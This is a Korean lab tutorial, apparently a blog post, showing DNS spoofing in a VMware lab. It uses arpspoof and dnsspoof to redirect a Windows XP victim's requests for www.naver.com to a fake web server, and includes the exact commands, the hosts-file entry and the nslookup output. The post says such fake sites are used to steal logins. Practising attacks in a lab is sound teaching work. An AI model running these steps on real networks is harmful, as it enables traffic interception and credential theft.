DNS 스푸핑
dns 스푸핑은 공격 대상의 dns 질의를 가로채 정상 dns 서버보다 빨리 dns 응답을 전송해,
공격 대상이 해당 dns 질의에 대해 공격자가 설정한 잘못된 응답을 수신하도록 하는 공격이다.
예를 들어, www.naver.com의 IP주소가 1.1.1.1이라 하자.
공격 대상이 www.naver.com의 의 IP주소를 질의하기 위해 dns 질의를 로컬 네임 서버에 전송하면,
공격자가 해당 dns 질의를 가로채 정상 네임 서버의 응답보다 빨리 www.naver.com의 ip주소가 4.4.4.4라는 응답을 전송하는 것이다.
공격 대상이 해당 응답을 정상 네임 서버의 응답보다 빨리 수신하면, 공격 대상은 www.naver.com의 IP주소가 4.4.4.4인 줄 알고 해당 IP로 접속할 것이다.
이 포스트에서는 VMware 환경에서 dns 스푸핑을 실습해본다.
실습환경 : VMware 16
사용 프로그램 : fragrouter, dsniff, fake
network : NAT
공격자
IP : 192.168.11.19
h/w address : 00:0C:29:E3:D3:C0
공격 대상 1 (XP)
IP : 192.168.11.77
h/w address : 00:0C:29:8F:7E:5F
가짜 Web 서버
IP : 192.168.11.23
진행 순서
1. 공격 전, 공격 대상에서 www.naver.com 접속 확인
2. 접속을 유도할 위조 web 서버 구축
3. /etc/dsniff/dnsspoof.hosts 파일 수정 (공격자)
4. arp 스푸핑을 통해 게이트웨이로 가는 패킷 도청 (공격자)
5. dns 스푸핑 개시
6. 공격 대상에서 www.naver.com 접속 결과 확인
1. 공격 전, 공격 대상에서 www.naver.com 접속 확인
2. 접속을 유도할 위조 web 서버 구축
apache 웹 서버를 구축한다.
보통 위조 웹 서버는 실제 웹 사이트와 똑같이 만들어서 로그인 등의 정보를 빼내는 데 사용한다.
3. /etc/dsniff/dnsspoof.hosts 파일 수정 (공격자)
# vi /etc/dsniff/dnsspoof.hosts
===========================================
...
...
192.168.11.23 www.naver.com <- 추가
===========================================
4. arp 스푸핑을 통해 게이트웨이로 가는 패킷 도청 (공격자)
# arpspoof -t 192.168.11.77 192.168.11.1
5. dns 스푸핑 개시
# dnsspoof ‐i eth0 ‐f /etc/dsniff/dnsspoof.hosts
6. 공격 대상에서 www.naver.com 접속 결과 확인
nslookup으로 확인해보면, 로컬 네임 서버가 정상(203.248.252.2)임에도 불구하고,
www.naver.com ip주소가 위조 웹 사이트의 주소로 저장되어 있다.
Microsoft Windows XP [Version 5.1.2600]
<C> Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\st> nslookup www.naver.com
Server: cns3.boar.net
Address: 203.248.252.2
Non-authoritative answer:
Name: www.naver.com
Address: 192.168.11.23
C:\Documents and Settings\st>
주소창에 www.naver.com을 입력하면, 위조 웹 서버로 연결된다.
